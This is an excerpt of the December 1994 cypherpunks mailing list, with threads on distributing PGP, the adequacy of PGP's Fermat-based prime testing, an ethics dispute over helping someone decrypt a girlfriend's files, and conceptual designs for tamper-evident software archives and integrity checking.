http://cybernet.co.nz/home/bryce/www/home.html From crawford at scruznet.com Mon Dec 26 19:28:41 1994 From: crawford at scruznet.com (Michael D. Crawford) Date: Mon, 26 Dec 94 19:28:41 PST Subject: PGP at MacWorld Expo? Message-ID: <199412270328.TAA24759@scruz.net> The MacWorld Expo is coming up soon in San Francisco, I believe from the 4th through the 7th of January. There must be _someone_ on this list who works for a company or user group that will be exhibiting (I know for sure the Berkeley Macintosh User's Group always exhibits, as does the Boston Computer Society). Do the world a favor. Distribute PGP from your booth. This being the MacWorld Expo, you'll need mostly Mac disks, but you would want to have some Unix and DOS disks on hand as well. Have flyers about the Digital Telephony Bill, to clue in the legislatively impaired. Imagine what a crowd you'll draw to your booth with a sign reading "Unbreakable encryption software - just $3 a disk". You might even make headlines in the trade rags or the SF newspapers. Certainly BMUG and BCS already have the "infrastructure" to sell freeware disks. But any of your companies out there would do well to sell freeware disks too. I understand, from my own experience of working at MacWorld (no, I won't be exhibiting...), that one of the biggest objections to this will be simply dealing with getting the disks duped and labeled, getting them to the show floor, and dealing with the large number of people who will be purchasing the disks and needing you to make change. This could be no small amount of impact on your booth operations. Another option is to offer PGP free with any purchase of your regular product, or to just distribute flyers about the DT bill with instructions for obtaining PGP from the Internet and online services. Regards, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From adam at bwh.harvard.edu Mon Dec 26 20:19:36 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 26 Dec 94 20:19:36 PST Subject: Milton on CSPAN Message-ID: <199412270419.XAA20160@bwh.harvard.edu> Got this, thought there might be interest. | if you have cable, Milton Friedman will be discussing Hayek on CSPAN | (I'm not sure whether I or II, I think I) this Wednesday at 8. From dmandl at bear.com Tue Dec 27 07:08:31 1994 From: dmandl at bear.com (dmandl at bear.com) Date: Tue, 27 Dec 94 07:08:31 PST Subject: Breaking into girlfriend's files Message-ID: <9412271452.AA23162@yeti.bsnet> Black Unicorn writes: > I guess I suffered from the silly idea that as a whole, the members of > the list would not put short term morality before the long term goal. Do me a favor, Uni: I want to assassinate you and all the other members of your family. Could you send me some powerful handguns and silencers? Oh, and while you're at it, give me all of your addresses and precise travel schedules for the next two weeks. As an "amoralist," I'm sure you won't put short term morality before my long-term goal. Thanks. > It seems there are those who disagree with me. I would offer the > following: While it may be that Joe Break-Into-Girlfriend's-Files may or > may not be justified, that is not ours to judge. I'll judge what I want to, OK? What are you trying to do, _coerce_ me into giving information to someone that I don't want to? > It is simply for the > crypto non-challenged to comment on the security or lack thereof of a > given system. Hmm, sounds like you're telling us what to do. And defining what "we" are, to boot. I'm many things besides "crypto non-challenged." I'm an individual and an individualist, not a cog with a particular static role in society, which is apparently the way you'd like it. If you ask me what the color of the sky is, I can say "39" if I want. > As soon as this list turns into a pile of bleeding heart > liberals, anxious to embroil themselves in the personal matters of > others, it has failed. Yeah, well it seems you were just as quick as the "bleeding heart liberals" to scold others and impose your personal (a-)morality. Typical. > I cannot believe that people on this list, those who claim to be > interested in the preservation of privacy, would support the proposition > that knowledge about the strength or weakness of a given system should be > surpressed. No one was suppressing anything or in any way attempting to stop the flow of information. They were just expressing their opinions. Just because _you_ were unhappy with those opinions, that's no reason to hurl accusations of censorship around. I can refuse to give help to anyone I don't feel like helping, and if I feel like giving him a piece of my mind in the process, that's my business and his. > I submit that the response should have been the same regardless of the > nature of the material. > > Which is it going to be? > > > 1> > > Q: "How do you attack X?" > A: "Y" > > or > > > 2> > > Q: "How do you attack X?" > A: "Realistically X should not be attacked, because to allow the > widespead lack of confidence in X will destroy society as we know it, and > anyhow it's nasty." Great, I've always wanted to be a simple input-output machine. Pseudo-individualist Republican rubbish... --Dave. From A5113643667 at attpls.net Tue Dec 27 07:57:06 1994 From: A5113643667 at attpls.net (Tom Jones) Date: Tue, 27 Dec 94 07:57:06 PST Subject: credit card charges Message-ID: <05D763C0> Peace @ bix.com has posted a Windows program mpj/public/pgcharge.zip to ftp.csn.org that will create an order with a credit card using X12 formats that will be signed and encrypted with PGP and then sent to a mailer. The posting asks for volunteers to serve as alpha testers for the program. Tom From nobody at jpunix.com Tue Dec 27 09:30:12 1994 From: nobody at jpunix.com (Anonymous) Date: Tue, 27 Dec 94 09:30:12 PST Subject: voice encryption for portable PCs Message-ID: <199412271729.LAA04661@jpunix.com> an109574 at anon.penet.fi wrote: > I fully expect Phil's voice encryption software to become the de facto > telephonic standard just as PGP became the Internet standard. Cogon's > Aquafone, while commendable, has the disadvantage of employing DES. > I presume Phil will select a more resilient conventional algorithm. I don't see any reason to believe that triple DES is less secure than other currently popular algorithms such as IDEA, although 3DES does require somewhat more processor power. From david.lloyd-jones at canrem.com Tue Dec 27 09:35:40 1994 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Tue, 27 Dec 94 09:35:40 PST Subject: EXPORT CONTROLS ON RC In-Reply-To: <9412242216.AA21275@vail.tivoli.com> Message-ID: <60.18040.6525.0C1C5D08@canrem.com> DL+ > Bzzzt, Eric. The Constitution applies to the whole shootin' | > match. + > Congress, Executive, States, agencies, CIA, you name it. MM+I think you should read the Constitution more carefully. No doubt I should. No doubt everybody should. In the current discussion, though, what is it you think I've missed? -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * Luxuriantly hand-crafted from only the finest ASCII. From danisch at ira.uka.de Tue Dec 27 11:41:22 1994 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 27 Dec 94 11:41:22 PST Subject: Are 2048-bit pgp keys really secure ? Message-ID: <9412271941.AA19596@elysion.iaks.ira.uka.de> -----BEGIN PGP SIGNED MESSAGE----- A 2048-bit pgp key ( n=p*q somewhere around 2^2048, p and q somewhere around 2^1024) is only as secure as it looks like, if both p and q are prime numbers. In fact p and q are only pseudo prime numbers, they are not proven to be prime numbers. It is known only that they have a high probability to be prime numbers. Usually a candidate number is send through a probabilistic prime test which says either "No, not a prime" or "a prime with a probability of at least 50% ". Usually this test is repeated 10 or 20 times, so after passing this iteration the probability of having a prime number is at least 1:2^10 or 1:2^20 . Would such a test be sufficient for generating 1024-bit prime numbers? Does it make sense to use pseudo-prime-numbers with a low probability of 1:2^10 only to generate a rsa key with a 2048 bit n ? Now have a look at pgp2.6.2: In genprime.c the prime numbers are generated. After testing the candidates with a table of small primes, they are passed to slowtest(). [Read slowtest and its comment...] slowtest() does not do one of the usual primality tests. It just passes the candidate through a Fermat test. Only four (4!) passes are done. The comment of slowtest() gives a probability of 10^-44 to fail for a number of about 512 bit. If this is true ( 10^-44 ~ 2^-146 ), about one of 10^44 keys is weak. This shouldn't be a problem, 10^44 is quite big. But at the moment I can't follow the arguments, why 4 Fermat tests should be enough to find good (pseudo-)primes. I can't see a reason why the iteration should already be stopped after the 4th loop. Generating a key should be worth to wait some minutes longer, especially when this doesn't need interactive work. I am also not convinced yet of the Fermat test. Why not use a Rabin-Miller-Test ? I have read only a very small piece of the pgp code yet, but if I understand the code of slowtest well (correct me if not...) the command mp_init(x, primetable[i]) for i=0,1,2,3 sets mpi x to the values 2,3,5,7 . If I understood this well, the slowtest() is nothing more than testing for a given p whether 2^(p-1) = 1 mod p 3^(p-1) = 1 mod p 5^(p-1) = 1 mod p 7^(p-1) = 1 mod p Any comments? BTW: The comment of slowtest() references "Finding Four Million Large Random Primes", by Ronald Rivest, in Advancess in Cryptology: Proceedings of Crypto '91. I have the "Advances in Cryptology - Crypto '91, Proceedings", Lecture Notes in Computer Science, 576, Springer, here. Call me blind or stupid, but I can't find the referenced Article. Neither the Title in the contents, nor R. Rivest in the Author Index. Can anybody tell me where to find the referenced Article ? Hadmut Danisch BTW 2: pgp2.6.2 doesn't work well if a key identified by its keyid is keychecked ( pgp -kc 0x... ). It stops after the first signature with a signators key shorter than the signed/checked key, because the global precision is changed and not changed back for testing the signature. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwBtzGc1jG5vDiNxAQHi6wP/WS3afYhQ0ijJZfWbByjtvPrCZtCfDs1M 1p8Paqx0ZIIgCE2G6tY8JTlZ6tn5nEY4/qGHS3Q3TrO77HVheKq2bHMajGzSA3At CoX65ycg2Pn30q7PeLY89vtNosW568CqnmpPAmusD+o9CFO6RpFFZxIb5pgY5brF 8ll/F1ztdmM= =JZS6 -----END PGP SIGNATURE----- From eric at remailer.net Tue Dec 27 12:06:18 1994 From: eric at remailer.net (Eric Hughes) Date: Tue, 27 Dec 94 12:06:18 PST Subject: Are 2048-bit pgp keys really secure ? In-Reply-To: <9412271941.AA19596@elysion.iaks.ira.uka.de> Message-ID: <199412272106.NAA01249@largo.remailer.net> From: danisch at ira.uka.de (Hadmut Danisch) Usually a candidate number is send through a probabilistic prime test which says either "No, not a prime" or "a prime with a probability of at least 50% ". Usually this test is repeated 10 or 20 times, so after passing this iteration the probability of having a prime number is at least 1:2^10 or 1:2^20 . The probability of a composite passing one trial is extremely small, much smaller than 50%. _And_ the trials with different moduli are _not_ independent, so you just can't multiply the probabilities together. Rather, you have to calculate a chain of conditional probabilities. There was a paper in the last seven or eight years on this. I believe Pomerance was one of the authors. Ask on sci.crypt for details. I am also not convinced yet of the Fermat test. Why not use a Rabin-Miller-Test ? Rabin-Miller would be better. It would be instructive to examine the conditional probability that a composite number which fails Rabin-Miller passes Fermat. I understand it's vanishingly small. Eric From cjl at welchlink.welch.jhu.edu Tue Dec 27 14:41:11 1994 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Tue, 27 Dec 94 14:41:11 PST Subject: swIPe pointer please Message-ID: I need a pointer to swIPe info and preferably an FTP site. Responses to me by E-mail please. C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From perry at imsi.com Tue Dec 27 14:46:46 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 27 Dec 94 14:46:46 PST Subject: swIPe pointer please In-Reply-To: Message-ID: <9412272246.AA03324@snark.imsi.com> There is stuff on ftp.csua.berkeley.edu; I'll warn you that swIPe is creaking badly and will probably be updated Real Soon Now. Perry cjl says: > > I need a pointer to swIPe info and preferably an FTP site. > > Responses to me by E-mail please. > > C. J. Leonard ( / "DNA is groovy" > \ / - Watson & Crick > / \ <-- major groove > ( \ > Finger for public key \ ) > Strong-arm for secret key / <-- minor groove > Thumb-screws for pass-phrase / ) > From merriman at metronet.com Tue Dec 27 15:31:11 1994 From: merriman at metronet.com (David K. Merriman) Date: Tue, 27 Dec 94 15:31:11 PST Subject: Comdex Disks? Message-ID: <199412272331.AA09920@metronet.com> Sorry to divert everyone from the other threads, but I happen to have some somewhat crypto-related question: Back some time ago, there was some discussion of giving away disks at Comdex in NY; by any chance, does anyone have a copy of the contents of what was on those disks? I'd like to be able to give away 'basic info' in easy-to-handle format :-) Thank for any help/pointers. We return you now to your regular mailing list..... Dave Merriman - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From rah at shipwright.com Tue Dec 27 15:43:49 1994 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 27 Dec 94 15:43:49 PST Subject: Breaking into girlfriend's files Message-ID: Psst! Is Tim here? What? He's on vacation? Cool. Ahem. > := At 9:52 AM 12/27/94, dmandl at bear.com >> := Black Unicorn dmandl> No one was suppressing anything or in any way attempting to stop the flow dmandl> of information. They were just expressing their opinions. Just because dmandl> _you_ were unhappy with those opinions, that's no reason to hurl accusations dmandl> of censorship around. dmandl> dmandl> I can refuse to give help to anyone I don't feel like helping, and if I feel dmandl> like giving him a piece of my mind in the process, that's my business and his. unicorn>> Q: "How do you attack X?" unicorn>> A: "Realistically X should not be attacked, because to allow the unicorn>> widespead lack of confidence in X will destroy society as we know it, and unicorn>> anyhow it's nasty." dmandl> Great, I've always wanted to be a simple input-output machine. dmandl> dmandl> Pseudo-individualist Republican rubbish... As a pedigreed piece of Pseudo-individualist Republican rubbish (PIRR) myself, I take exception to that remark. Associating noble PIRR with pseudonyms named for inappropriately-colored fictional creatures really gets my, ahem, goat. It seems to me the proper answer to the original poster of this thread was to greet it with a deafening silence. First, because the answer is trivial given the technical level of this list (well, the average technical level, anyway) and can be obtained elsewhere. Second, because there is such a diversity of ethics, politics, and moral belief on this list, because the fundemental nature of the technology we discuss here and its potential impact on human society is so great, to address the question on its merits would unleash enough verbal flatulatence (including my own, I'm afraid) to rival even the best Mel Brooks epic. To employ an appropriately PIRR sports metaphor, the question was a pitch so *obviously* a slow lob over the plate, such an *easy* target for flamage, that it should have been very apparent to anybody here that it wouldn't have been fair at all to the pitcher to even swing at it. Short of letting it fall into the mitt with a dull thud, a pointer to the appropriate HAKK3r d00d list would have been the next best thing. This was done. Next on the list would be actually answering the question as quickly as possible. This was done. (Thank you, Perry.) The quierant will probably not be able to execute the proper solution anyway. He'll probably run out of steam before executing it, and if he does it anyway, he deserves all the shit he'll find himself in upon decrypting those files. We were all young and stupid once. Some of us still are, it appears. The posting was inadvertant flamebait, yes? Let the rubble bounce already. Can we take the rest of the discussion off-line now? Cheers, Bob Hettinga P.S. My apologies to M(s)r. 'Corn if I stepped on he/she/it's er, hooves. I meant to cast no asparagas upon he/she/it's choice of nym-name. ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From merriman at metronet.com Tue Dec 27 16:04:21 1994 From: merriman at metronet.com (David K. Merriman) Date: Tue, 27 Dec 94 16:04:21 PST Subject: Comdex Disks? Message-ID: <199412280004.AA15066@metronet.com> > >David K. Merriman says: >> Back some time ago, there was some discussion of giving away disks at Comdex >> in NY; > >Comdex isn't held in New York. Fine. Whatever the hell the damn expo-thingy that was held in New York sometime in the April/May timeframe. Dave Merriman - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From ianf at sydney.sgi.com Tue Dec 27 16:10:36 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 27 Dec 94 16:10:36 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu> Message-ID: <9412281058.ZM10837@wiley.sydney.sgi.com> On Dec 23, 1:11am, Mark Terka wrote: > Oh goody! Now we are getting a judgement call with respect to how cryptography > in general aids "the greater good". Please indicate where I said or implied this. Possibly there is such a thing as the "greater good", but I have seen it used too many times to justify the applications of someone's personal beliefs or (more commonly) phobias and personal problems to the world at large. It's not a concept I have a lot of respect for, purely on this basis. Personally - and let's face it, none of us can express much more than a personal opinion - I think the best that any of us can do is to base our decisions on individual cases, which seems to have been what has happened in this case. > Do you suppose the NSA makes the same call when they do routine traffic > analysis or try to bust a suspiciously (to them) encrypted message?????? No I don't. On the other hand, I am sure that a whole load of judgement calls go into the selection of individuals or subjects which go onto watchlists. > That to me indicates that the members of this list should be at least > remotely interested in the subject of attacks as well as defense as you > can't defend aginst something unless the method of attack has been discussed. Agreed. But that doesn't mean that the way you go around investigating attacks on protocols and cryptosystems is to help a fairly pathetic individual violate someone else's privacy. To me, that just doesn't follow. > GROAN! (again) And how, pray tell, do we go about protecting ourselves > against others if we are not prepared to discuss what sort of attacks > may be mounted against us????? I never said we should not discuss it. But I do say that IN MY OPINION the original poster who wanted help was a pathetic little slime, and that IN MY OPINION, shouldn't be assisted to do anything. Generic attacks on Norton's Encrypt are "valid" subjects for cypherpunks discussion, which I would have thought goes without saying. An even better outcome would be to provide the girlfriend with some indication of the true security against attack she is getting from the program, and to replace it with something better if it turns out to be inadequate. > Like I alluded to before, I bet if it was a case of someone trying to > descramble something like skipjack to try and discover something about > National Security (ours OR theirs) I bet the members of this list > would have fallen all over themselves trying to help the original poster. I suppose that would depend on what the individuals concerned perceived as the consequences of their action. > I don't recall seeing too much in the waqy of condemnation of the guy that > posted RC4 to this list ..... but as soon as we see something that touches > close to home like male/female relationships, the shit hits the fan!!!!! So? Based on past conversations and discussions, many of us are here because we don't like the idea of organisations or individuals being able to arbitrarily violate our own privacy. Speaking for myself, I know that I have had my privacy violated on a couple of occasions, and have become convinced that technical solutions are the way to go about it. But it does not follow that I should help someone violate another's privacy. It seems that some people feel that their own privacy is inviolate, yet others are fair game. > >Possibly. IMO, what the original requester was asking for was so > >repulsive and immature that the responses so far have been mild. > And in my opinion what the original poster was no different than the British > attack on "Enigma" or the American attack on "Purple". Well, wartime attacks like these are usually motivated by the belief that a lot of people's lives depend on the success of the venture. Whether this is true or not is debatable, and the lives in question are usually on one side only. I personally do not find the comparison to be valid. Ian. #include From storm at marlin.ssnet.com Tue Dec 27 16:14:46 1994 From: storm at marlin.ssnet.com (Don Melvin) Date: Tue, 27 Dec 94 16:14:46 PST Subject: Looking for PGE Message-ID: <9412280011.AA28136@marlin.ssnet.com> Someone recently posted a list of steganography files. I've managed to l\o\s\e\secure that information and can't f\i\n\d\access it. Does anyone have a pointer to PGE (Pretty Good Envelop) or a recomendation for another program for MSDos? Thanks! -- America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far) Don Melvin storm at ssnet.com finger for PGP key. From wcs at anchor.ho.att.com Tue Dec 27 16:17:16 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 27 Dec 94 16:17:16 PST Subject: Making sure a program gets to the receiver intact Message-ID: <9412280015.AA22592@anchor.ho.att.com> Eric writes: > From: an169306 at anon.penet.fi > How can I insure a program, once put on FTP sites stays untampered with? > > The best solution is not digital signatures but rather digital > timestamping. The question is not persistence of authorship but > rather persistence through time. > [Discussion of the implications of getting your keys hacked, over time] Some good points, but on the whole I'll disagree. Either way, the solution pretty much comes down to "eternal vigilance".... The interesting technique that digital timestamping provides is that it lets you show that the version you claim you posted to the ftp site got there before the [different] version that's there now. To use that technique, either you need to broadcast the details of the digital timestamping in an unhackable public fashion, or else someone who wants to validate the archived data needs to check with you to be sure that they have a good checksum matching your timestamp. An ftp server *could* timestamp each incoming document, keeping the master timestamp data in an un-hackable location, and post the current timestamps for the current time period [e.g. day] in the (hackable) archive, and then register the day's timestamp file with a notary service so you can be sure that the file hasn't been compromised later. On the other hand, without signatures, it's not too hard for a Bad Guy to store bogus files on the server and get them timestamped too - the user needs a good way to check for previous editions of the document in the timestamp file. With digital signatures, at least a given file has some internal consistency. > The holes: > 1: Someone hacking the keyservers, substituting a key for all the people > who signed, and modifing the archive to show that. That's why keyservers are inherently non-trustable; the trust comes from the Web of Trust connections you have, though a keyserver run by a widely-trusted person carrying only keys signed by him/her/it is stronger. > 2: Someone breaking into my apt, sticking a keyboard monitor on, getting > my passphrase and key. Yup. That's a problem with signatures. Bill From ianf at sydney.sgi.com Tue Dec 27 16:23:06 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 27 Dec 94 16:23:06 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: <9412281117.ZM10874@wiley.sydney.sgi.com> On Dec 23, 11:28pm, Black Unicorn wrote: > > What a load of amoral rubbish. > By who's standard? Yours? Of course. Whose are you speaking for, if not your own? > > Cypherpunks is a group whose members believe in the application of > > technology to PROTECT privacy, not to violate someone else's. > > Once you assume that capability implies right, you're on very > > shakey moral ground, but that is exactly what you are saying in this > > post. I find that position repellent, and I would be very surprised > > and not a little disappointed if you find many others here who felt > > the same way. > Who the hell are you to define the position of cypherpunks? > Who the hell are any of us to do this? I agree. I thought that it was rather obvious that all of us are speaking for ourselves. My statement of position was based on my perception of the original list statement of intent, and the discussion I have seen over the last six months. > I guess I suffered from the silly idea that as a whole, the members of > the list would not put short term morality before the long term goal. Possibly you did, although I question whether the two are incompatible. > It seems there are those who disagree with me. I would offer the > following: While it may be that Joe Break-Into-Girlfriend's-Files may or > may not be justified, that is not ours to judge. Rubbish. Nor do you seem particularly backwards at being judgemental, or are you applying a different standard to the issue of what is right and wrong to discuss as you are to the original discussion? > I cannot believe that people on this list, those who claim to be > interested in the preservation of privacy, would support the proposition > that knowledge about the strength or weakness of a given system should be > surpressed. I don't recall anyone who did mention censorship. I saw a lot of people suggesting that helping the original pathetic individual was not a good idea, and then several howls of outrage accusing these people of censorship. There is a difference between non-disclosure and censorship, and its not an arbitrary one either. > Disgusting. Get off this list, you belong on alt.codependency.recovery, > or alt.bleeding.liberal. But isn't that exactly what you're proposing? "Get off the list because your position disagrees with mine." Sounds like censorship to me, except that "Black Unicorn" is the one deciding what is acceptable. Ian. #include From mab at crypto.com Tue Dec 27 16:45:01 1994 From: mab at crypto.com (Matt Blaze) Date: Tue, 27 Dec 94 16:45:01 PST Subject: Making sure a program gets to the receiver intact In-Reply-To: <9412280015.AA22592@anchor.ho.att.com> Message-ID: <199412280046.TAA26043@crypto.com> Bill Stuart writes: >> How can I insure a program, once put on FTP sites stays untampered with? ... >On the other hand, without signatures, it's not too hard for a Bad Guy >to store bogus files on the server and get them timestamped too - >the user needs a good way to check for previous editions of the >document in the timestamp file. With digital signatures, >at least a given file has some internal consistency. > >> The holes: >> 1: Someone hacking the keyservers, substituting a key for all the people >> who signed, and modifing the archive to show that. >That's why keyservers are inherently non-trustable; the trust comes from >the Web of Trust connections you have, though a keyserver run by a >widely-trusted person carrying only keys signed by him/her/it is stronger. > >> 2: Someone breaking into my apt, sticking a keyboard monitor on, getting >> my passphrase and key. >Yup. That's a problem with signatures. > Another, practical, problem with integrity checks (both signatures and timestamps) for files on public archive servers is that the receiver has to expect them and know how to verify them. Current ftp and www clients certainly don't have facilities to do this automatically, and neither do users have reason to suspect foul play if a timestamp or signature is missing for some file. It's somewhat analogous to the situation ten years ago when some nut was lacing over-the-counter drugs with poison and putting the packages back on the shelf. The major drug companies responded by including tamper-evident seals on their packages, but until consumers learned to expect the seals, all the bad guys had to do was remove the seal entirely before replacing the tainted packages. In the short term, given today's infrastructure, there's not a lot you can do. Of course, in the medium- and long- term, the best solution is to design good schemes and deploy them widely enough that people learn to expect them. -matt From nesta at nesta.pr.mcs.net Tue Dec 27 17:02:35 1994 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Tue, 27 Dec 94 17:02:35 PST Subject: Making sure a program gets to the receiver intact In-Reply-To: <199412280046.TAA26043@crypto.com> Message-ID: On Tue, 27 Dec 1994, Matt Blaze wrote: > including tamper-evident seals on their packages, but until consumers > learned to expect the seals, all the bad guys had to do was remove > the seal entirely before replacing the tainted packages. In the short > term, given today's infrastructure, there's not a lot you can do. > > Of course, in the medium- and long- term, the best solution is to > design good schemes and deploy them widely enough that people learn > to expect them. > One solution, or start of a solution, is to tell the user about the signature checks, and how to go about verifying them in teh README text file, that most users come to expect in a package of software. Or perhaps add into the tar and zipped packagea file called SIGNATURECHECK or something suitably obvious, as well as explaining it. I believe most users expect the README file enough to look in it, at least skimming it. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From perry at imsi.com Tue Dec 27 17:08:27 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 27 Dec 94 17:08:27 PST Subject: Making sure a program gets to the receiver intact In-Reply-To: Message-ID: <9412280107.AA03553@snark.imsi.com> Nesta Stubbs says: > One solution, or start of a solution, is to tell the user about the > signature checks, and how to go about verifying them in teh README text > file, that most users come to expect in a package of software. And if someone edits that out of the README? .pm From nesta at nesta.pr.mcs.net Tue Dec 27 17:18:23 1994 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Tue, 27 Dec 94 17:18:23 PST Subject: Making sure a program gets to the receiver intact In-Reply-To: <9412280107.AA03553@snark.imsi.com> Message-ID: On Tue, 27 Dec 1994, Perry E. Metzger wrote: > > Nesta Stubbs says: > > One solution, or start of a solution, is to tell the user about the > > signature checks, and how to go about verifying them in teh README text > > file, that most users come to expect in a package of software. > > And if someone edits that out of the README? put it int he file that pops up from the FTP server when you switch to that directory, am not sur what the file is called, but like when you switch to the pub/Linux directory on sunsite, it gives youa rundown of what Linux is and all. Then the person would hav to hack access to the FTp server to change that. And I assume ti is easier for the maintaner of the FTp site to keep track of that one readme, then it is to keep track of the readmes in all the ppackages. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From ianf at sydney.sgi.com Tue Dec 27 17:39:30 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 27 Dec 94 17:39:30 PST Subject: Making sure a program gets to the receiver intact In-Reply-To: Message-ID: <9412281230.ZM11016@wiley.sydney.sgi.com> On Dec 27, 7:14pm, Nesta Stubbs wrote: > put it int he file that pops up from the FTP server when you switch to > that directory, am not sur what the file is called, but like when you > switch to the pub/Linux directory on sunsite, it gives youa rundown of > what Linux is and all. The ftpd's that implement the directory-change messages is not a standard one, and that functionality has been added to the servers which support it (possibly Linux ships with wuftpd, but no commercial version of Unix I know does.) The extended servers are very widely available, and although they do make ftp so much nicer to administer, they are not as widely deployed as I would have expected by now. Ian. From ianf at sydney.sgi.com Tue Dec 27 18:08:12 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 27 Dec 94 18:08:12 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <9412232039.AA03986@merckx.info.att.com> Message-ID: <9412281256.ZM11042@wiley.sydney.sgi.com> On Dec 23, 3:39pm, Matt Blaze wrote: > essential services for me like taking backups. This means that, no > matter how hard I try, it's impossible for me to be sure that none of > my files have been tampered with. Some time ago I looked at tripwire, and wondered if a personal version could be produced which would allow a similar function to be performed on a system which had a hostile sysadmin (a position I was in a few years ago, and it's not pleasant). The problem is that although you can protect the data file of hashes (by using a pass phrase to encrypt it), protecting the binary which does the checking is rather more difficult. Sure, you can checksum it and lock that checksum in the encoded file, but a hostile attacker could make the self-check a special case which always returns good, and then snaffle the pass phrase. Once they had the pass phrase, the protection is dead. Over lunch (ie. warning, not a lot of thought given to this :), I wondered if you could do something like this: Have a simple bootstrap loader, and the encrypted main program. The bootstrap loader asks for the pass phrase, and decrypts the main program and runs it. The main program checks the loader for modification, and if there is a problem, refuses to go further with a indication to the original account owner (eg. overwrite the main program with one which simply prints "Main prog hacked at ". If all is well, the main program asks for a further pass phrase to the data file, and goes off to check all of the files in the listed areas (for the moment, the details of how it does that is not particularly relevant - all I am concerned about in this post is the protection of the binary). Obvious Attacks: 1. Attack the main program. You can't, because it is encrypted (presumably with some sort of hash in there too), and so you can only trash it. 2. Attack the loader. This is possible, because it is in plaintext form. Dangers: a. The attacker may get your pass phrase. However, when the main program then sums the original loader, it will notice that it had changed and won't go further. Your pass phrase for the main program has been compromised, but the data file remains ok. b. The attacker may get a copy of the main program. That's fine, because the main program won't run (see above), and the user will be warned. c. (The main danger). The loader program loads the main program, but before copying itself back it replaces the trojan version with the original image (possibly even resetting the timestamp on the file). This is a problem. 3. Attack the datafile. Same a (1), really. 4. Attack the running image. Both 2(c) and 4 are the main problems. Using gcore or procfs the malicious system admin can grab a running copy of the binary, and do what they like. There are many tricks to avoiding the danger of 4 (which applies to all crypto code running on hostile systems), but all are just that: tricks. They can be overcome given enough time and motivation. But 2(c) is the hassle, as there is no obvious way around this, and it is quite easy to do. Anyone got any good ideas? I have a lurking suspicion that there are no solutions to this problem, and we're down to the same issue of securing the transport system which delivers a binary (which is not possible in this case). Just an interesting diversion over a very boring lunch.... Ian. From eric at remailer.net Tue Dec 27 18:38:02 1994 From: eric at remailer.net (Eric Hughes) Date: Tue, 27 Dec 94 18:38:02 PST Subject: Making sure a program gets to the receiver intact In-Reply-To: <9412280015.AA22592@anchor.ho.att.com> Message-ID: <199412280237.SAA02055@largo.remailer.net> From: wcs at anchor.ho.att.com (bill.stewart at pleasantonca.ncr.com +1-510-484-6204) The specific question is tampering of files on archive sites. The larger issue is information, particularly software, distribution. My position is that timestamping is a better solution than signatures for the tampering issue and that both are useful for the larger issue. Some good points, but on the whole I'll disagree. Either way, the solution pretty much comes down to "eternal vigilance".... Well, "eternal vigilance" is really "public information". Both the timestamping problem and the signature problem resolve down the same problem about secure _cleartext_ transmission. How do people gain an assurance that they have the same shared piece of information? The first advantage that timestamping has over signatures is that timestamps are temporal and signatures are not. Private keys for signatures change over time by design, but timestamp roots do not, also by design. That is, once a timestamp root has been securely transmitted, there is an assurance that everything up to that point is OK. Spoofing a signature, however, can be done by spoofing a key change; there are public information solutions to this as well, but they still do not have temporal assurances. The second advantage is the the timestamp roots are more widely shared than individual public keys. Because more people look at this one piece of information, it's much harder to completely forge. The cost of verification is smaller per person, but there is much more total verification performed. The root keys in a certification hierarchy have the same property of wide sharing, but the effect on public key distribution is not the same. The creation of the timestamp root is a _technically_ linkage of all the individual timestamps, while the root key of a certifying authority creates _social_ links between the root key and the other keys. The technical linkage is stronger. The interesting technique that digital timestamping provides is that it lets you show that the version you claim you posted to the ftp site got there before the [different] version that's there now. You can also post a public announcement, timestamped, which has the location and the timestamp of the information and the archive. This public announcement has public information properties as above. To use that technique, either you need to broadcast the details of the digital timestamping in an unhackable public fashion, The "unhackable" nature is not even necessary to assume. All you need is the ability to post public information with some non-zero probability of success. Eventually the public information gets out. The timestamp will indicate priority. There's also the possibility of timestamping the entire directory tree periodically. This is all publicly verifiable, so an interposer would have to intercept the very first transmission and could not come along later and perform undetectable corruption. On the other hand, without signatures, it's not too hard for a Bad Guy to store bogus files on the server and get them timestamped too - Sure, that's the whole point. Any information protection, signatures or timestamps, can 